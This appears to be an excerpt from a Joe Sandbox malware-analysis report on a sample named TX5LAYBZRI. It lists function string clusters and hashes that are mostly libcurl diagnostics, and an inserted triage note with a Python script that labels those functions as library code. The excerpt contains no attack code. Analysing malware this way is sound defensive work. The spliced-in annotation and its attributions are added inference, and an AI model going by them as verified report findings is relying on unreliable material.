                                             • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
                                            • API String ID: 0-3977460686
                                            • Opcode ID: 639b8ca5b6aa351d4d2d7d966d6c5f01e85ab3e5663425af7934e91d0d695956
                                            • Instruction ID: a3e3d740b82921b6dd4cc0e5c802fc6bb6e9eb9ae69371eac64f7af27220ad01
                                            • Opcode Fuzzy Hash: 639b8ca5b6aa351d4d2d7d966d6c5f01e85ab3e5663425af7934e91d0d695956
                                            • Instruction Fuzzy Hash: 7C326BB1A0C3018BC724AE289C4131ABBD69FD7320F1547BDF9A59B3D2E7B4D9458782
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                             • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: -vc$ans$ate$attempts$ndot$out$retr$retr$rota$time$use-$usev
                                            • API String ID: 0-1574211403
                                            • Opcode ID: 84b1acfdc95faf62c186e17283ece3db6e5a972c63a1c2cb1cb3258feb19d748
                                            • Instruction ID: 4b37c619211a73ec2b9cc3a6c27ca4e816f66836b18ae529f0a08a18914cd5fc
                                            • Opcode Fuzzy Hash: 84b1acfdc95faf62c186e17283ece3db6e5a972c63a1c2cb1cb3258feb19d748
                                            • Instruction Fuzzy Hash: 7C6108A5A083106BE714A624AC53B3BB6D9FBA4344F04843DFC4E97293FE71DE449253
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                             • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                            • API String ID: 0-1914377741
                                            • Opcode ID: c71ee754de940b29d7b7c23adf06793e36d9e1a03b17fd89bc3b911e0b12c548
                                            • Instruction ID: 117203e76467b7b540ff0fc866b047e374d8d99afa9e39480c5824541070dc03
                                            • Opcode Fuzzy Hash: c71ee754de940b29d7b7c23adf06793e36d9e1a03b17fd89bc3b911e0b12c548
                                            • Instruction Fuzzy Hash: 8A721830A08B419BE7359A18C5467F6B7D2DF91344F0886ACED855B292EBF6D884C783
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                             • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld
                                            • API String ID: 0-3476178709
                                            • Opcode ID: 7f09c27a536d00b0796cf1d0813d8f82d3bbafdfb132035d26a4d4d09fbb135f
                                            • Instruction ID: 812ee4c29b7d948b0acb5c3e90f9108171eed9e5989a88b9adfaabbc9272d41d
                                            • Opcode Fuzzy Hash: 7f09c27a536d00b0796cf1d0813d8f82d3bbafdfb132035d26a4d4d09fbb135f
                                            • Instruction Fuzzy Hash: 1831FD72B18A4876F73C1109DC86F3E209BC3CAB10F7AC27DB9069B2C2D8F59E4441A5
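                                             Triage note on the string clusters above (added here; this is not part of the Joe Sandbox report or its IDA plugin). The String ID fields for the functions in the 00B90000 image reproduce libcurl's own diagnostics: "cookie.c", "libpsl problem, rejecting cookie for satety" and the "__Host-"/"__Secure-" prefixes come from lib/cookie.c, "urlapi.c" and "xn--" from lib/urlapi.c, and the "%4lldk"/"%2lld.%0lldG" size formats and "** Resuming transfer from byte position" from lib/progress.c. That marks these functions as a statically linked libcurl rather than the sample's own logic, which is worth knowing before spending reversing time on them. The script below is an added example of doing that attribution mechanically from the report's "String ID" lines; the marker table is an assumption drawn from libcurl source and can be extended, and the sample entries are copied from the report lines above.

```python
"""Attribute the string clusters of Joe Sandbox IDA-plugin function entries to
statically linked libcurl.  Added example for this report, not Joe Sandbox's
own code.  The marker table is an assumption built from libcurl source-file
names and diagnostic strings; the report itself only lists the strings."""
from typing import Dict, List, Set

# Marker substring -> libcurl source file that contains it (assumed mapping).
LIBCURL_MARKERS: Dict[str, str] = {
    "cookie.c": "lib/cookie.c",
    "libpsl problem, rejecting cookie for satety": "lib/cookie.c",
    "__Host-": "lib/cookie.c",
    "__Secure-": "lib/cookie.c",
    "urlapi.c": "lib/urlapi.c",
    "xn--": "lib/urlapi.c",
    "** Resuming transfer from byte position": "lib/progress.c",
    "%2lld.%0lldG": "lib/progress.c",
    "%4lldk": "lib/progress.c",
}


def parse_string_id(line: str) -> List[str]:
    """Split a report '• String ID:' line on the '$' separator the report uses."""
    _, _, payload = line.partition("String ID:")
    return [s for s in payload.strip().split("$") if s]


def attribute(strings: List[str]) -> Dict[str, Set[str]]:
    """Return {source file: set of markers seen} for one function's strings."""
    hits: Dict[str, Set[str]] = {}
    for s in strings:
        for marker, src in LIBCURL_MARKERS.items():
            if marker in s:
                hits.setdefault(src, set()).add(marker)
    return hits


def classify_entry(string_id_line: str, min_markers: int = 2) -> str:
    """'libcurl:<file>' when at least min_markers corroborate, else 'unknown'.

    Two independent markers are required so that a single generic token
    (a month name, a lone 'domain') cannot mislabel sample-specific code."""
    hits = attribute(parse_string_id(string_id_line))
    if not hits:
        return "unknown"
    src, markers = max(hits.items(), key=lambda kv: len(kv[1]))
    return f"libcurl:{src}" if len(markers) >= min_markers else "unknown"


# Sample input: String ID lines copied from the report entries above, keyed by
# the first eight hex digits of each entry's Opcode ID.
SAMPLE_ENTRIES: Dict[str, str] = {
    "2b2f84fd": """• String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version""",
    "639b8ca5": "• String ID: Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep",
    "c71ee754": "• String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--",
    "7f09c27a": "• String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld",
}


def triage(entries: Dict[str, str]) -> Dict[str, str]:
    """Classify every entry; returns {opcode prefix: verdict}."""
    return {opcode: classify_entry(line) for opcode, line in entries.items()}


if __name__ == "__main__":
    for opcode, verdict in triage(SAMPLE_ENTRIES).items():
        print(f"{opcode}  {verdict}")
```

The month-name cluster is deliberately left as "unknown": those tokens appear in many date parsers, so a single generic match is not enough to write a function off as library code, while two independent libcurl markers in the same function are.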
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $.$;$?$?$xn--$xn--
                                            • API String ID: 0-543057197
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $d$nil)
                                            • API String ID: 0-394766432
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                            • API String ID: 0-2555271450
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                            • API String ID: 0-2555271450
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: default$login$macdef$machine$netrc.c$password
                                            • API String ID: 0-1043775505
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                            • API String ID: 0-4201740241
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .DAFSA@PSL_$===BEGIN ICANN DOMAINS===$===BEGIN PRIVATE DOMAINS===$===END ICANN DOMAINS===$===END PRIVATE DOMAINS===
                                            • API String ID: 0-2839762339
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                            • API String ID: 0-3285806060
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$@$gfff$gfff
                                            • API String ID: 0-2633265772
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %$&$urlapi.c
                                            • API String ID: 0-3891957821
                                            • Opcode ID: e7b390492b6467a135abbc7f1230e4b1a636082abd794f1849efd42829ae8bfb
                                            • Instruction ID: fef09abc748e1c9578c10adf40146072ccf5505fc7b5ee57e3911bdfc483057c
                                            • Opcode Fuzzy Hash: e7b390492b6467a135abbc7f1230e4b1a636082abd794f1849efd42829ae8bfb
                                            • Instruction Fuzzy Hash: CD22BCA1A083415BEB245A248C917FBB7D5DB91314F1845AEF88A463C2FBBDDC488753
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $
                                            • API String ID: 0-227171996
                                            • Opcode ID: 7428c13b0146dac2c28c0ef0ae9823075625c5f678d84117d61cdca5de9c38ce
                                            • Instruction ID: 6d2f31920ee7ad45d7ac6073f3be67c08dcb5fbcbdfa975d55c93872dce33853
                                            • Opcode Fuzzy Hash: 7428c13b0146dac2c28c0ef0ae9823075625c5f678d84117d61cdca5de9c38ce
                                            • Instruction Fuzzy Hash: 49E251B1A083A19FD360DF29D48075AFBE0BF88754F10891DE88997351E779E844EF82
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .12$M 0.$NT L
                                            • API String ID: 0-1919902838
                                            • Opcode ID: e2fe44c49008a426cdd6181bd2556c0077c58ef982cc295a4b51ba01f2d71aed
                                            • Instruction ID: 340ac0aa2769a36be23989aaa3e5a6dc17c3f75eaa75cdbd336f42b3769b4fb8
                                            • Opcode Fuzzy Hash: e2fe44c49008a426cdd6181bd2556c0077c58ef982cc295a4b51ba01f2d71aed
                                            • Instruction Fuzzy Hash: 7251C3B46003499BDB159F20C8C4BAA77F8EF48304F1485A9ED4C9F252E775DE88CB96
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: -----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----$vtls/vtls.c
                                            • API String ID: 0-424504254
                                            • Opcode ID: c5dae620999645df65b31ad746a3204b016439f9e46bf3e1c2cfdc52887c18d1
                                            • Instruction ID: 156eac117f25a5769a49da7946a99a123cd825ecba51ce76b9328a0f5d93ee4f
                                            • Opcode Fuzzy Hash: c5dae620999645df65b31ad746a3204b016439f9e46bf3e1c2cfdc52887c18d1
                                            • Instruction Fuzzy Hash: 1B314762A087515BEB29293D9C81BB57AC1DFA1318F1C47BCE4D59B292FADD8C00C791
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #$4
                                            • API String ID: 0-353776824
                                            • Opcode ID: 7d07e08d686842b9eee1800dc0e968fb5c5182dba69e2b427b19bfe035a2da88
                                            • Instruction ID: 4893f5b758a97e4e2560eab9eca4fb2ab1e11bfe8b0f045adebff59e46bd64ed
                                            • Opcode Fuzzy Hash: 7d07e08d686842b9eee1800dc0e968fb5c5182dba69e2b427b19bfe035a2da88
                                            • Instruction Fuzzy Hash: C322C431A097418FC714DF28C8806AAF7E1FF84354F148B2DE8D997391E774A885EB92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #$4
                                            • API String ID: 0-353776824
                                            • Opcode ID: aa3d81908d3ecfc74d4f23fb4c6d5a0f05227800a08e888fb616fbf31a5ebd1e
                                            • Instruction ID: 3cb212bad88e07b1391db7f8ecf9cc8a27fd95d466fce73982a0ad3b110a17d3
                                            • Opcode Fuzzy Hash: aa3d81908d3ecfc74d4f23fb4c6d5a0f05227800a08e888fb616fbf31a5ebd1e
                                            • Instruction Fuzzy Hash: AB12D132A087018BC764CF18C4847ABB7E5FFC4318F198A7DE99957391D774A884EB92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: H$xn--
                                            • API String ID: 0-4022323365
                                            • Opcode ID: 2bbdfb34b130b8f4256b61872e90278cf9ddadab548dc9f766a57435d3ee466e
                                            • Instruction ID: c551bd1807c12c6d7fa68215a83658bc4cdf9ed76a2b78f5d760dbd2c13cf357
                                            • Opcode Fuzzy Hash: 2bbdfb34b130b8f4256b61872e90278cf9ddadab548dc9f766a57435d3ee466e
                                            • Instruction Fuzzy Hash: 5DE14B72A083158FD718DE28D8D07AEB7D2AFC4324F198A3DD99687381D774EC859782
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Downgrades to HTTP/1.1$multi.c
                                            • API String ID: 0-3089350377
                                            • Opcode ID: 94a3920ec97b182d57d39b84eae88fa47358c16ee5bdc2e72df784fe8908f31f
                                            • Instruction ID: 53e3852258d31f4daf628353223658232c618a5c5638978e8ff125cdbe601e33
                                            • Opcode Fuzzy Hash: 94a3920ec97b182d57d39b84eae88fa47358c16ee5bdc2e72df784fe8908f31f
                                            • Instruction Fuzzy Hash: BFC11671A0C701ABD750DF28D88176AB7E0FF96314F0849BCF48997292E771E958CB92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 127.0.0.1$::1
                                            • API String ID: 0-3302937015
                                            • Opcode ID: 25b094be41ba8e324644b3c628c708ecdd08fc09b99710bb5d2d786a033b1ee7
                                            • Instruction ID: 03bbd4d6dcd2ff410fe91c3880620c8e95d62b9f068ed2e27249fe10f27a7048
                                            • Opcode Fuzzy Hash: 25b094be41ba8e324644b3c628c708ecdd08fc09b99710bb5d2d786a033b1ee7
                                            • Instruction Fuzzy Hash: 5EA1B9B5C04742DBE700DF21C84576AB7A0FF99300F158A69EC898B261F770EAD4D796
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: BQ`
                                            • API String ID: 0-1649249777
                                            • Opcode ID: ab65973e656852fd4e20d49a32daa31f5a8fc9dc124974d9ce0468dbd2704513
                                            • Instruction ID: 9d3c1c5a59e5d0652cb2f60f9d5185f300d48e6b98631f8270b7ed8c9429bdd7
                                            • Opcode Fuzzy Hash: ab65973e656852fd4e20d49a32daa31f5a8fc9dc124974d9ce0468dbd2704513
                                            • Instruction Fuzzy Hash: F1A2AF71608799CFCB14CF1AC4906A9BBE1FF98358F15866DE8A99B391D330E940CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \
                                            • API String ID: 0-2967466578
                                            • Opcode ID: 8d4b1bac8beddce43741f040a3fba70215d1e10b1da2507d2d9b8d44a5203aa0
                                            • Instruction ID: 7aee4669abb579fafb77d0cab8e5ef3f172244f19c5273cdf3685c2570966a7f
                                            • Opcode Fuzzy Hash: 8d4b1bac8beddce43741f040a3fba70215d1e10b1da2507d2d9b8d44a5203aa0
                                            • Instruction Fuzzy Hash: 1102076E9083056BE724AA25DC41B2B76D89F50346F444839FC9987183F631EF8CD7AB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmp
